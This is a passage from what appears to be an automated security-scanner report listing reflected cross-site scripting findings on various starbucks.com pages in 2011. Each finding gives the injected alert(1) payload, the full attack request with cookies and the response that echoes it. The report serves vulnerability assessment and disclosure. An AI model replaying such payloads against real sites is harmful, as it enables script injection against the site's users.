   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?60e4f";alert(1)//ccc1047f29b=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.51. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e440"style%3d"x%3aexpression(alert(1))"503f9615132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e440"style="x:expression(alert(1))"503f9615132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?5e440"style%3d"x%3aexpression(alert(1))"503f9615132=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:11 GMT
Connection: close
Content-Length: 43839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?5e440"style="x:expression(alert(1))"503f9615132=1" />
...[SNIP]...

2.52. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47d4a"%3balert(1)//629b8d5aeec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47d4a";alert(1)//629b8d5aeec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?47d4a"%3balert(1)//629b8d5aeec=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:17 GMT
Connection: close
Content-Length: 43744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
= {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643064966001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?47d4a";alert(1)//629b8d5aeec=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.53. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca7e4"style%3d"x%3aexpression(alert(1))"acb65ae86d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca7e4"style="x:expression(alert(1))"acb65ae86d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast?ca7e4"style%3d"x%3aexpression(alert(1))"acb65ae86d6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:20 GMT
Connection: close
Content-Length: 40353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast?ca7e4"style="x:expression(alert(1))"acb65ae86d6=1"/>
...[SNIP]...

2.54. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a6b9"style%3d"x%3aexpression(alert(1))"d5a41dc5583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a6b9"style="x:expression(alert(1))"d5a41dc5583 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast?1a6b9"style%3d"x%3aexpression(alert(1))"d5a41dc5583=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:22 GMT
Connection: close
Content-Length: 40708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast?1a6b9"style="x:expression(alert(1))"d5a41dc5583=1"/>
...[SNIP]...

2.55. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff70"style%3d"x%3aexpression(alert(1))"6f0990795c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eff70"style="x:expression(alert(1))"6f0990795c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/latin-america?eff70"style%3d"x%3aexpression(alert(1))"6f0990795c7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:01 GMT
Connection: close
Content-Length: 46735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?eff70"style="x:expression(alert(1))"6f0990795c7=1" />
...[SNIP]...

2.56. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edbf"%3balert(1)//c0d90c55a41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9edbf";alert(1)//c0d90c55a41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/latin-america?9edbf"%3balert(1)//c0d90c55a41=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:14 GMT
Connection: close
Content-Length: 46640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101031001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9edbf";alert(1)//c0d90c55a41=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.57. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4325"style%3d"x%3aexpression(alert(1))"db73de7f50b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4325"style="x:expression(alert(1))"db73de7f50b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?f4325"style%3d"x%3aexpression(alert(1))"db73de7f50b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:36 GMT
Connection: close
Content-Length: 42978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?f4325"style="x:expression(alert(1))"db73de7f50b=1" />
...[SNIP]...

2.58. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3a82"%3balert(1)//5ab9813aafa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3a82";alert(1)//5ab9813aafa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?d3a82"%3balert(1)//5ab9813aafa=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:39 GMT
Connection: close
Content-Length: 42883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
vars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101033001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?d3a82";alert(1)//5ab9813aafa=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.59. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 124ea"%3balert(1)//bd639cab20c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 124ea";alert(1)//bd639cab20c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse?124ea"%3balert(1)//bd639cab20c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:59 GMT
Connection: close
Content-Length: 52656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
"text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759747001";
   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse?124ea";alert(1)//bd639cab20c=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.60. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df34"style%3d"x%3aexpression(alert(1))"fb0a4a5b623 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3df34"style="x:expression(alert(1))"fb0a4a5b623 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse?3df34"style%3d"x%3aexpression(alert(1))"fb0a4a5b623=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:56 GMT
Connection: close
Content-Length: 52751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse?3df34"style="x:expression(alert(1))"fb0a4a5b623=1" />
...[SNIP]...

2.61. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fa72"style%3d"x%3aexpression(alert(1))"5a47d7b77de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fa72"style="x:expression(alert(1))"5a47d7b77de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community?9fa72"style%3d"x%3aexpression(alert(1))"5a47d7b77de=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:38 GMT
Connection: close
Content-Length: 41639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community?9fa72"style="x:expression(alert(1))"5a47d7b77de=1" />
...[SNIP]...

2.62. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community/mystarbucksidea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dde"style%3d"x%3aexpression(alert(1))"e7346a933d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49dde"style="x:expression(alert(1))"e7346a933d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community/mystarbucksidea?49dde"style%3d"x%3aexpression(alert(1))"e7346a933d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:15 GMT
Connection: close
Content-Length: 41683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community/mystarbucksidea?49dde"style="x:expression(alert(1))"e7346a933d9=1"/>
...[SNIP]...

2.63. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f184b"style%3d"x%3aexpression(alert(1))"96125b2cebe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f184b"style="x:expression(alert(1))"96125b2cebe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/entertainment?f184b"style%3d"x%3aexpression(alert(1))"96125b2cebe=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:51 GMT
Connection: close
Content-Length: 54188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/entertainment?f184b"style="x:expression(alert(1))"96125b2cebe=1" />
...[SNIP]...

2.64. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90a4e"%3balert(1)//d2bb761e82e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90a4e";alert(1)//d2bb761e82e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse/entertainment?90a4e"%3balert(1)//d2bb761e82e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:54 GMT
Connection: close
Content-Length: 54093

